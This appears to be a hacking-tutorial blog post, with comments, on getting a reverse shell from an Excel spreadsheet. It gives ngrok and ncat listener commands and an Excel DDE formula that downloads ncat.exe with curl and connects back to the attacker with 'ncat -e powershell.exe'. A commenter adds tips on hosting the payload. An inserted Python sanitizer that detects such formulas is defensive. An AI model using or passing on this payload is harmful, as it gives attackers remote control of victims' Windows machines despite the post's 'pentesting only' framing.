Hi guys, welcome back to another blog. I hope you are all doing fine :)
Today's blog is closely related to our previous blog, which was about how to
* Get Reverse Shell from Word Documents *
In this blog, we are going to perform the same task, but this time we will be using Excel rather than Word. But before we get into the setup, let me warn you that the knowledge you get must never be used to inflict harm on an individual or an organization, and if that happens, we (thedecentshub) will not be held liable.
So without wasting any further time let's start...
* Lab Environment Configuration
We will perform all the reverse shell accessor tasks on a Kali Linux machine, and the provider (the person providing the reverse shell) will use a Windows environment to run Microsoft Excel (this is a must, because it allows us to successfully execute macros).
* Pre-requisites for this task
First, we will be using the * Ngrok Server * for port forwarding, which gives our private localhost environment a public identity. If you want to know how to set up the Ngrok server, you can check this full video tutorial - Setup the Ngrok Server by Clicking on me!
The second thing we need to set up is the * Ncat tool *, which builds the TCP connection between two computers. We will design a payload that relies entirely on Ncat for the reverse shell procedure.
The third thing we need is a free online file hosting service where we will host our ncat.exe file, so that we can provide its URL in our payload and remove the dependency on this software on the client side.
So let's begin :
STEP1: So guys, first we will forward our port using the Ngrok server. Since we want to build a TCP connection between two different PCs, we will forward our TCP port.
To do that, we need to type the command -
./ngrok tcp 1234 (1234 is the example port)
It will forward your port, something like this, and will provide a public identity to your private domain.
STEP2: Now guys, you need to use the Ncat tool to open a listener, which is where you will receive the reverse shell.
Use the command - ncat -nvlp 1234 (the port must be the same as the one given to Ngrok).
If you get an error saying that it is not installed, install it using
In Kali - * sudo apt install ncat *
STEP3: After the listener is opened, we move on to our Excel payload.
In cell A1 of our Excel sheet, we need to type the given payload -
=cmd| '/C curl -v [URL/path of the ncat.exe hosted online] --output ncat.exe'!nm.A1&cmd| '/C ncat.exe Ngrok HOST Ngrok Port -e powershell.exe'!nm.A1
First, let me tell you about the curl command used above: its purpose is to download the ncat.exe file onto the provider's system, so that no dependency remains.
Next, we have provided the Ncat command, which builds the TCP connection and hands PowerShell as a reverse shell to the accessor's PC, where the listener is open.
So finally guys, either after saving the file and opening it, or after executing the macro directly, you get the reverse shell to the provider's PC.
But guys, in this case you get a serious warning from Excel, and the payload executes only with your consent, since anything can be malicious if not handled with care.
The act I demonstrated to you is for pentesting purposes only. Sometimes, due to weak input validation, files may contain these sorts of payloads, which can cause great loss of data/integrity when executed. So we need to properly validate everything and make sure everything passes only after proper encryption and validation.
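The validation mentioned above belongs at the point where untrusted values are written into a spreadsheet export. The following is an added example, not code from the original post: it flags cells that Excel would evaluate, labels the application|'topic'!item shape used in STEP3 (a DDE reference), and prefixes such cells with a single quote so they are shown as text. The function names and sample rows are constructed for illustration.

```python
import csv
import io
import re

# Leading characters that make Excel evaluate a cell instead of showing it.
TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# DDE reference shape: application|'topic'!item
DDE_PATTERN = re.compile(r"[A-Za-z0-9_.]+\s*\|\s*'[^']*'\s*!")
# Signed plain numbers such as -42 are data, not formulas.
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")

def classify_cell(value):
    """Return 'plain', 'formula' or 'dde' for one untrusted cell value."""
    text = value.lstrip(" ")
    if not text.startswith(TRIGGERS) or PLAIN_NUMBER.fullmatch(text.strip()):
        return "plain"
    return "dde" if DDE_PATTERN.search(text) else "formula"

def sanitize_rows(rows):
    """Prefix risky cells with a quote; return (clean_rows, findings)."""
    clean, findings = [], []
    for r, row in enumerate(rows):
        out = []
        for c, cell in enumerate(row):
            kind = classify_cell(cell)
            if kind != "plain":
                findings.append((r, c, kind))
                cell = "'" + cell  # Excel then renders the cell as text
            out.append(cell)
        clean.append(out)
    return clean, findings

def to_csv(rows):
    """Serialize with every field quoted so separators cannot split a cell."""
    buf = io.StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL).writerows(rows)
    return buf.getvalue()

# Constructed sample rows; the last cell only mimics the DDE shape.
SAMPLE_ROWS = [
    ["alice", "-42", "paid"],
    ["bob", "10", "=SUM(B2:B3)"],
    ["mallory", "0", "=cmd| '/C [placeholder command]'!A1"],
]

if __name__ == "__main__":
    cleaned, found = sanitize_rows(SAMPLE_ROWS)
    print(found, to_csv(cleaned), sep="\n")
```

The findings list gives the row and column of every neutralized cell, so the export job can log or reject the submission instead of silently rewriting it.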
I have also created a video on the same topic. If you have any doubts related to the blog, you can also refer to the YouTube video link provided below -
So guys, that's all for this blog. If you like the content, you can follow me and also subscribe to my YouTube channel. If you guys want me to keep bringing you these sorts of blogs and videos, you can show your support to me ...
Great blog, really helpful!! Thanks!!
Thanks, Glad You liked the content.
You are already getting a URL from ngrok so you don't need to sign up for any free service to host the ncat file. Ngrok has an option for you to be able to host something.